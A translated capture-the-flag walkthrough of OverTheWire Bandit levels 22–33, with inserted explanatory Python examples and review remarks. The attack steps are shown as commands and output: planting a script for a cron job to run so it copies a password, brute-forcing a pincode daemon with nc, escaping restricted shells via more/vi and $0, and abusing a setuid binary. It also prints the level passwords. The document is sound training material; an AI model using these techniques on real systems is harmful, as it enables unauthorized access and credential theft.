1. Level 22

1.1. Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

1.2. Solution

This level is clearly an upgraded version of the previous one...

The goal also says we have to learn to read shell scripts written by other people, which means this level involves some shell scripting knowledge.

That comes later, though; first let's look in the directory the goal points us to.

$ ls /etc/cron.d/
atop cronjob_bandit22 cronjob_bandit23 cronjob_bandit24

Same approach as the previous level: go straight to the next level's cronjob.

$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

If you have some shell scripting background, this is easy to follow.

A few brief notes:

  • $() runs the command inside it and substitutes its output
  • Variables are created simply by assigning to them; to use one, prefix its name with $

The rest you can look up yourself.

What the script does is roughly this: it computes the MD5 of a string with md5sum, then splits the output and keeps only the hash field.

Since this script runs as user bandit23, we can simply replace the key variable in the script with that constant.

$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
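
The derivation above, reproduced as an added example (not code from the page or from OverTheWire) to show why the target name is guessable: the hashed input includes the newline that echo appends, and any user who can read the script can compute the path. The `owner_only_target` function is an assumed hardening, not part of the level.

```python
"""Level 22: why the /tmp target is predictable, and a safer way to name it.

Added example, not code from the page or from OverTheWire. It replicates the cron
script's derivation (echo ... | md5sum | cut -d ' ' -f 1), including the trailing
newline that echo adds, and contrasts it with an unguessable owner-only temp file."""
import hashlib
import os
import stat
import tempfile


def md5_of_echo(text: str, trailing_newline: bool = True) -> str:
    """MD5 hex digest of what `echo text | md5sum` actually hashes.

    echo terminates its output with a newline, so that byte is part of the
    hashed input; leave it out and the digest no longer matches the script's."""
    data = (text + "\n" if trailing_newline else text).encode()
    return hashlib.md5(data).hexdigest()


def predictable_target(user: str) -> str:
    """Path the level-22 cron job writes the password to, from the username alone.

    Anyone who can read the script can compute it, and /tmp is world-readable,
    so the copied password ends up readable by every user on the box."""
    return "/tmp/" + md5_of_echo(f"I am user {user}")


def owner_only_target(directory: str) -> str:
    """Assumed hardening, not from the page: mkstemp picks a random name and
    creates the file O_EXCL with mode 0600, so the name cannot be precomputed
    and other users cannot read the contents."""
    fd, path = tempfile.mkstemp(prefix="bandit_pass_", dir=directory)
    os.close(fd)
    return path


def demo_owner_only() -> int:
    """Create a hardened target, return its permission bits, and clean up."""
    path = owner_only_target(tempfile.gettempdir())
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(predictable_target("bandit23"))  # the /tmp/8ca3... path from the transcript
    print(oct(demo_owner_only()))          # 0o600
```
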
bandit23_password = jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

2. Level 23

2.1. Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

2.2. Solution

This level is again an upgrade of the previous one: we not only have to read scripts, we have to write one.

The hint also says the script we write is deleted after it is executed, so we had better keep a backup.

But we don't know where the script has to go, so, as in the previous level, let's first look at the next level's script.

$ ls /etc/cron.d/
atop cronjob_bandit22 cronjob_bandit23 cronjob_bandit24
$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done

Here the -s option of timeout specifies the signal sent when the command exceeds its time limit; 9 is SIGKILL, which kills the process.

The signal table, for reference:

$ kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM
16) SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ
26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR
31) SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3
38) SIGRTMIN+4 39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8
43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7
58) SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2
63) SIGRTMAX-1 64) SIGRTMAX

In any case, our script will have finished within 60 seconds; the result may not show up immediately...

So the shell script is easy to write: just model it on the previous level's script.

There is one question, though: where do we write the password to?

It is actually like level 12: we need to create a new directory under /tmp and put our things there.

Besides, we have no permissions anywhere else...

$ mkdir /tmp/ylsword_24
$ cd /tmp/ylsword_24

Then we write the shell script directly in vim and copy it over when it's done.

One small issue: a freshly created file does not have execute permission, so we have to set that as well.

/tmp/ylsword_24$ vim ylsword.sh

ylsword.sh:

#!/bin/bash

# copy bandit24's password into our directory (the cron job runs this as bandit24)
cat /etc/bandit_pass/bandit24 > /tmp/ylsword_24/password

/tmp/ylsword_24$ chmod 777 ylsword.sh

There is another pitfall here: the directory's permissions.

Let's list the current directory's details.

/tmp/ylsword_24$ ls -al
total 305928
drwxrwx--- 2 bandit23 root 4096 Apr 20 21:03 .
drwxrws-wt 1 root root 313204736 Apr 20 21:03 ..
-rwxrwxrwx 1 bandit23 root 70 Apr 20 20:38 ylsword.sh

As you can see, users other than the owner and the root group have no permissions on it, so we also have to open up this directory, otherwise the file cannot be written into it.

/tmp/ylsword_24$ chmod 777 .

Then copy the script over.

/tmp/ylsword_24$ cp ylsword.sh /var/spool/bandit24

Wait at most one minute, then look at the current directory again.

/tmp/ylsword_24$ ls
password ylsword.sh
/tmp/ylsword_24$ cat password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit24_password = UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

3. Level 24

3.1. Level Goal

A daemon is listening on port 30002 and will give you the password for
bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode.
There is no way to retrieve the pincode except by going through all of the 10000
combinations, called brute-forcing.

3.2. Solution

This level obviously wants us to write a script to brute-force the pincode.

Recalling the similar earlier level (level 14), first we need to determine whether to use nc or openssl.

$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1234
Wrong! Please enter the correct pincode. Try again.

Looks like plain nc works. Note the prompt tells us to send the current level's password together with the pincode; I typed a random pincode and, no such luck, it was wrong...

Now the script itself is easy to write, but it still has to live in our own /tmp directory.

Since the temporary directory we created in the previous level already has the right permissions, we can reuse it.

There are two ways to go about the brute force, though:

  1. Generate the candidate lines on the fly and redirect them into nc's standard input
  2. Write all candidate lines to a file first, then redirect that file into standard input

In testing, the second method is faster for this level; also, the open port blocks when too many people are connected to it...

That is, sometimes you can't even connect with nc, never mind run a script; you can only wait until the others have finished their brute force...

I'll demonstrate with the second method.

$ cd /tmp/ylsword_24
/tmp/ylsword_24$ vim generatelist.sh

generatelist.sh:

#!/bin/bash

level24_password="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

# seq -w 0 9999 yields the zero-padded pincodes 0000..9999
# (seq -w 9999 alone starts at 0001 and would skip 0000)
for i in $(seq -w 0 9999); do
    echo "$level24_password $i" >> passlist.txt
done

Here $(seq -w 0 9999) generates the zero-padded sequence 0000 to 9999 (seq -w 9999 on its own would start at 0001 and miss 0000); {0000..9999} would work just as well.

/tmp/ylsword_24$ chmod 777 generatelist.sh
/tmp/ylsword_24$ ./generatelist.sh

Now we have a wordlist. Rather than writing a separate brute-force script, one command will do.

/tmp/ylsword_24$ cat passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.

This reveals a fairly serious problem: after running for a while, before you have tried every pincode, the server tells you it has timed out...

So... we have to brute-force in chunks...

/tmp/ylsword_24$ head -n 3000 passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.

In testing, even the first 3000 time out... seriously?! (facepalm)

Then I tried the last 1000 directly.

/tmp/ylsword_24$ tail -n 1000 passlist.txt | nc localhost 30002 | grep -v "Wrong!"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting.

This rubbish level finally produced a result~~

In fact we could write a script that loops over the chunks, but that is awkward in shell; you could also write it in Python, which is easier...

If you couldn't complete this level, understanding the principle is enough to move on; after all, I tried many more times later and couldn't connect either...

Also, for more complex shell scripts, I recommend testing them on your own Linux system first.

bandit25_password = uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
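
The chunked approach the text arrives at, as an added example in Python (not the author's or OverTheWire's code): `PincodeChecker` is a constructed stand-in for the daemon on port 30002 whose per-connection attempt budget plays the role of the server timeout, and the password and pincode are made-up values.

```python
"""Level 24: a stand-in for the pincode checker and the chunked search from the text.

Added example, not the page's code. PincodeChecker models the daemon on port 30002;
its per-connection attempt budget plays the role of the server timeout that cut the
10000-line pipe short. Password, pincode and budget are constructed values."""
from typing import Callable, List, Optional

BANNER = ("I am the pincode checker for user bandit25. Please enter the password for "
          "user bandit24 and the secret pincode on a single line, separated by a space.")
PASSWORD = "constructed_level24_password"   # constructed stand-in
SECRET_PIN = "8742"                          # constructed stand-in
NEXT_PASSWORD = "constructed_level25_password"


class PincodeChecker:
    """One simulated connection. The real server times out after some seconds; the
    budget counts submitted lines instead so that the example is deterministic."""
    def __init__(self, budget: int) -> None:
        self.budget = budget

    def handle(self, lines: List[str]) -> List[str]:
        out = [BANNER]
        for n, line in enumerate(lines):
            if n >= self.budget:
                out.append("Timeout. Exiting.")
                return out
            if line.split() == [PASSWORD, SECRET_PIN]:
                out += ["Correct!", f"The password of user bandit25 is {NEXT_PASSWORD}",
                        "", "Exiting."]
                return out
            out.append("Wrong! Please enter the correct pincode. Try again.")
        out.append("Exiting.")  # input ran out first (constructed behaviour)
        return out


def candidates(password: str) -> List[str]:
    """The generatelist.sh wordlist: '<password> 0000' through '<password> 9999'."""
    return [f"{password} {i:04d}" for i in range(10000)]


def find_pin(connect: Callable[[], PincodeChecker], lines: List[str],
             chunk_size: int) -> Optional[str]:
    """Feed the wordlist in chunks, one connection per chunk (the head/tail trick from
    the text, looped). Returns the pincode that was accepted, or None when every
    chunk ended in a timeout, which is what happens once chunk_size exceeds the budget."""
    for start in range(0, len(lines), chunk_size):
        chunk = lines[start:start + chunk_size]
        replies = connect().handle(chunk)
        if "Correct!" in replies:
            # replies[0] is the banner, so reply k answers chunk[k - 1]
            return chunk[replies.index("Correct!") - 1].split()[1]
    return None


if __name__ == "__main__":
    wordlist = candidates(PASSWORD)
    connect = lambda: PincodeChecker(budget=1000)
    print(find_pin(connect, wordlist, chunk_size=10000))  # None: one connection, times out
    print(find_pin(connect, wordlist, chunk_size=500))    # 8742
```

The budget only bounds a single connection and nothing stops a client from reconnecting, which is exactly why chunking works; a limit on total failed attempts per client, with a delay or lockout, is the control that actually makes a 10000-value space expensive.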

4. Level 25

4.1. Level Goal

Logging in to bandit26 from bandit25 should be fairly easy…
The shell for user bandit26 is not /bin/bash, but something else.
Find out what it is, how it works and how to break out of it.

4.2. Solution

This level looks a bit like level 18.

But let's log in to this level and look around first; after all, we don't have the password yet...

bandit25@bandit:~$ ls
bandit26.sshkey

There's a key file, just like level 13? It probably isn't that simple, though.

Let's try anyway: pull the key down to the local machine and try ssh.

LengSword:~$ ssh -i sshkey -p 2220 bandit26@bandit.labs.overthewire.org
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
...
Connection to bandit.labs.overthewire.org closed.

The ssh session is closed as soon as it connects.

Appending a command to run doesn't work either; nothing comes back.

Reading the goal again carefully: it says level 26's shell is not /bin/bash.

We can find out a user's shell by looking at the file /etc/passwd.

chsh also changes a user's default shell by modifying this same file.

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

Here we clearly see the default shell has been changed to the file /usr/bin/showtext.

Let's check what kind of file it is.

bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable

It's a script, so let's just print it out.

bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0

We see it changes the terminal environment variable TERM.

So how do we connect with ssh and get the contents of the password file before the shell exits?

First let me introduce a less common ssh option, -t, which forces pseudo-terminal allocation.

The man page explains -t as follows:

-t

Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

(Two study articles on terminals and pseudo-terminals were given here as background reading.)

Why do we force a pseudo-terminal? Because the script changes the terminal type, so when we connect there is no terminal we can interact with.

The next question is how to get into more's interactive mode without it exiting.

Or rather, how to run a command from inside more to get this level's password.

The answer is to shrink our terminal emulator so that few enough lines are displayed; then more doesn't exit immediately.

This uses a property of more: if the whole file fits on the terminal, more behaves exactly like cat.

In testing, the terminal must be at most 6 lines tall for more not to display everything at once.

This may differ between terminal emulators; try it yourself.

So, what's the next step?

Try more locally: once in its viewing mode, typing ? shows its commands.

Among them, v opens vi on the current line of the file being viewed.

So the problem becomes how to run a command from vi to read this level's password file.

Here are the concrete steps:

LengSword:~$ ssh -i sshkey -p 2220 -t bandit26@bandit.labs.overthewire.org
...
[more]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
--More--(83%)
[[v]]
[vi]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
"~/text.txt" [readonly] 6L, 258C
[[:r /etc/bandit_pass/bandit26]]
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

This level is really hard; it feels like a Linux shell-escape challenge.

bandit26_password = 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

5. Level 26

5.1. Level Goal

Good job getting a shell! Now hurry and grab the password for bandit27!

5.2. Solution

Connect with the password we obtained, using the previous level's method (shrinking the terminal).

From the previous level we know the problem is that the default shell was changed.

So why not just change it back?

As before, first get into vi.

[vi]
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
"~/text.txt" [readonly] 6L, 258C
[[:set shell=/bin/bash]]
[[:shell]]

And a normal shell is back.

$ ls
bandit27-do text.txt
$ file bandit27-do
bandit27-do: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8e941f24b8c5cd0af67b22b724c57e1ab92a92a1, not stripped

It's an executable; run it once to see how it is used.

$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id

So we can use it directly to get the next level's password.

$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
bandit27_password = 3ba3118a22e93127a4ed485be72ef5ea

6. Level 27

6.1. Level Goal

There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.

Clone the repository and find the password for the next level.

6.2. Solution

Looks like a simple level: basic git usage.

First, make a temporary directory for this level to put things in.

$ mkdir /tmp/ylsword_27
$ cd /tmp/ylsword_27

Then clone directly; the password is the same as this level's.

/tmp/ylsword_27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
/tmp/ylsword_27$ ls
repo
/tmp/ylsword_27$ cd repo
/tmp/ylsword_27/repo$ ls
README
/tmp/ylsword_27/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
bandit28_password = 0ef186ac70e04ea33b4c1853d2526fa2

7. Level 28

7.1. Level Goal

There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.

Clone the repository and find the password for the next level.

7.2. Solution

The first part is much like the previous level.

I'll just paste the process.

$ mkdir /tmp/ylsword_28
$ cd /tmp/ylsword_28
/tmp/ylsword_28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
...
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
/tmp/ylsword_28$ ls
repo
/tmp/ylsword_28$ cd repo
/tmp/ylsword_28/repo$ ls
README.md
/tmp/ylsword_28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

Since this level is about git, I'd guess this is a modified version of the file.

So we can use git log to look at the commit history.

/tmp/ylsword_28/repo$ git log
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

fix info leak

commit 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

add missing data

commit b67405defc6ef44210c53345fc953e6a21338cc7
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

initial commit of README.md

Obvious enough; let's look at the current commit's details.

/tmp/ylsword_28/repo$ git show
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200

fix info leak

diff --git a/README.md b/README.md
index 3f7cee8..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials

- username: bandit29
-- password: bbc96594b4e001778eee9975372716b2
+- password: xxxxxxxxxx
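
Review bot: this "fix info leak" commit does not fix the leak. Replacing `- password: bbc96594b4e001778eee9975372716b2` with `- password: xxxxxxxxxx` only changes the tip of master; the parent commit 186a1038 ("add missing data") still contains the real value, and a plain `git show` on the tip prints it from the removed line. The credential has to be treated as compromised and rotated, and if the value must disappear from the repository the history has to be rewritten and force-pushed with all clones discarded, not just the file edited.
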
bandit29_password = bbc96594b4e001778eee9975372716b2

8. Level 29

8.1. Level Goal

There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.

Clone the repository and find the password for the next level.

8.2. Solution

I won't go into the first part in detail.

Clone into our directory and cd into it.

/tmp/ylsword_29/repo$ ls
README.md
/tmp/ylsword_29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

"Production" immediately makes one think of branches.

In git the default main branch is master, and the development branch is usually dev.

But first let's see what branches there are.

/tmp/ylsword_29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev

Switch to the dev branch.

/tmp/ylsword_29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'

Then pull it down.

/tmp/ylsword_29/repo$ git pull
...
Already up-to-date.

Look at the log.

/tmp/ylsword_29/repo$ git log
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add data needed for development

commit a8af722fccd4206fc3780bd3ede35b2c03886d9b
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add gif2ascii

commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

fix username

commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

initial commit of README.md
/tmp/ylsword_29/repo$ git show
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200

add data needed for development

diff --git a/README.md b/README.md
index 1af21d3..39b87a8 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for bandit30 of bandit.
## credentials

- username: bandit30
-- password: <no passwords in production!>
+- password: 5b90576bedb2cc04c86a9e924ce42faf
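
Review bot: the `+- password: 5b90576bedb2cc04c86a9e924ce42faf` line commits a real credential into README.md on the dev branch. The `<no passwords in production!>` placeholder on master gives no protection: anyone who can clone the repository gets every branch (`git branch -a` above lists remotes/origin/dev), so the value should not live in any branch; keep it out of the tree (load it from the environment or a secrets store) and rotate this one.
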
bandit30_password = 5b90576bedb2cc04c86a9e924ce42faf

9. Level 30

9.1. Level Goal

There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.

Clone the repository and find the password for the next level.

9.2. Solution

Same as the previous level; I'll skip the cloning.

/tmp/ylsword_30/repo$ ls
README.md
/tmp/ylsword_30/repo$ cat README.md
just an epmty file... muahaha

Look at the log.

/tmp/ylsword_30/repo$ git log
commit 3aa4c239f729b07deb99a52f125893e162daac9e
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:44 2018 +0200

initial commit of README.md

Nothing there.

Check the branches.

/tmp/ylsword_30/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master

Nothing unusual.

Then look at the tags.

/tmp/ylsword_30/repo$ git tag
secret

Looks like we found it...

/tmp/ylsword_30/repo$ git show secret
47e603bb428404d265f59c42920d81e5

This is in fact the next level's password...

bandit31_password = 47e603bb428404d265f59c42920d81e5
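
For levels 28 to 30 together, an added example (not the author's or OverTheWire's code) that rebuilds the three leak patterns in a throwaway repository and then searches every commit reachable from any branch or tag, plus tags that point straight at a blob, for a pattern; the secrets are constructed placeholders and a git binary is assumed on PATH.

```python
"""Levels 28-30: secrets survive in git history, on other branches and in tags.

Added example, not the page's code: it builds a throwaway repository mirroring the
three levels, then searches every object reachable from any ref. Needs git on PATH;
every secret is a constructed placeholder."""
import re
import subprocess
import tempfile
from typing import Optional, Set, Tuple


def git(repo: str, *args: str, stdin: Optional[str] = None, check: bool = True) -> str:
    """Run one git command inside repo and return its stdout."""
    res = subprocess.run(["git", "-C", repo, *args], input=stdin, text=True,
                         capture_output=True, check=check)
    return res.stdout


def build_demo_repo() -> str:
    repo = tempfile.mkdtemp(prefix="git_leak_demo_")
    git(repo, "init", "-q")
    git(repo, "config", "user.name", "Demo")
    git(repo, "config", "user.email", "demo@example.invalid")

    def commit(readme: str, msg: str) -> None:
        with open(f"{repo}/README.md", "w") as fh:
            fh.write(readme)
        git(repo, "add", "README.md")
        git(repo, "commit", "-q", "-m", msg)

    # level 28: the secret is committed, then "fixed" by editing only the tip
    commit("username: bandit29\npassword: CONSTRUCTED_LEAKED_SECRET\n", "add missing data")
    commit("username: bandit29\npassword: xxxxxxxxxx\n", "fix info leak")
    # level 29: the default branch carries a placeholder, dev carries the value
    git(repo, "checkout", "-q", "-b", "dev")
    commit("username: bandit30\npassword: CONSTRUCTED_DEV_SECRET\n", "add data needed for development")
    git(repo, "checkout", "-q", "-")
    # level 30: a tag that points straight at a blob, reachable from no commit
    blob = git(repo, "hash-object", "-w", "--stdin", stdin="CONSTRUCTED_TAG_SECRET\n").strip()
    git(repo, "tag", "secret", blob)
    return repo


def scan_history(repo: str, pattern: str) -> Set[Tuple[str, str]]:
    """(where, matching line) for every hit in any commit reachable from any branch
    or tag, plus tags that point at a blob, which rev-list never visits."""
    hits: Set[Tuple[str, str]] = set()
    for rev_id in git(repo, "rev-list", "--all").split():
        # git grep exits 1 when nothing matches, so that is not an error here
        for line in git(repo, "grep", "-I", "-e", pattern, rev_id, check=False).splitlines():
            rev, _path, text = line.split(":", 2)
            hits.add((rev[:7], text.strip()))
    for tag in git(repo, "tag").split():
        if git(repo, "cat-file", "-t", tag).strip() == "blob":
            body = git(repo, "cat-file", "-p", tag)
            if re.search(pattern, body):
                hits.add((f"tag:{tag}", body.strip()))
    return hits
```

Running `scan_history(build_demo_repo(), "CONSTRUCTED_")` surfaces all three placeholders even though the tip of the default branch contains none of them.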

10. Level 31

10.1. Level Goal

There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo. The password for the user bandit31-git is the same as for the user bandit31.

Clone the repository and find the password for the next level.

10.2. Solution

Still a git level, so I won't explain the first part.

/tmp/ylsword_31/repo$ ls
README.md
/tmp/ylsword_31/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master

Create the file as instructed.

/tmp/ylsword_31/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/ylsword_31/repo$ ls
key.txt README.md

Then add the file to the repository.

/tmp/ylsword_31/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.

A .gitignore file is set up here too.

We could delete that file, or simply force-add ours.

I'll just force it.

/tmp/ylsword_31/repo$ git add -f key.txt
/tmp/ylsword_31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
(use "git reset HEAD <file>..." to unstage)

new file: key.txt

Commit.

/tmp/ylsword_31/repo$ git commit
...

Push.

/tmp/ylsword_31/repo$ git push
...
Counting objects: 3, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 329 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
bandit32_password = 56a9bf19c63d650ce78e6ec0354ee45e

11. Level 32

11.1. Level Goal

After all this git stuff it's time for another escape. Good luck!

11.2. Solution

After git, it's back to escape challenges...

Right after login we get this:

WELCOME TO THE UPPERCASE SHELL
>>

Every command we try fails.

>> ls
sh: 1: LS: not found
>> cat
sh: 1: CAT: not found

So for this level we have to try characters that don't get filtered.

$ turns out to work, and $0 actually stands for the current user's shell.

Type $0.

>> $0
$

We've escaped the user's default shell.

$ ls
uppershell
$ ls -l
total 8
-rwsr-x--- 1 bandit33 bandit32 7556 Oct 16 2018 uppershell

If you don't check the file permissions here you might miss it and not know what to do.

We see the file is owned by bandit33 and has the setuid bit set.

So, as in the similar earlier levels, since we are still inside this shell program, we can read the next level's password directly.

$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee
bandit33_password = c9c3199ddf4121b10cf581a98d51caee

12. Level 33

12.1. Level Goal

At this moment, level 34 does not exist yet.

12.2. Solution

I don't know how to do it either...

[End]
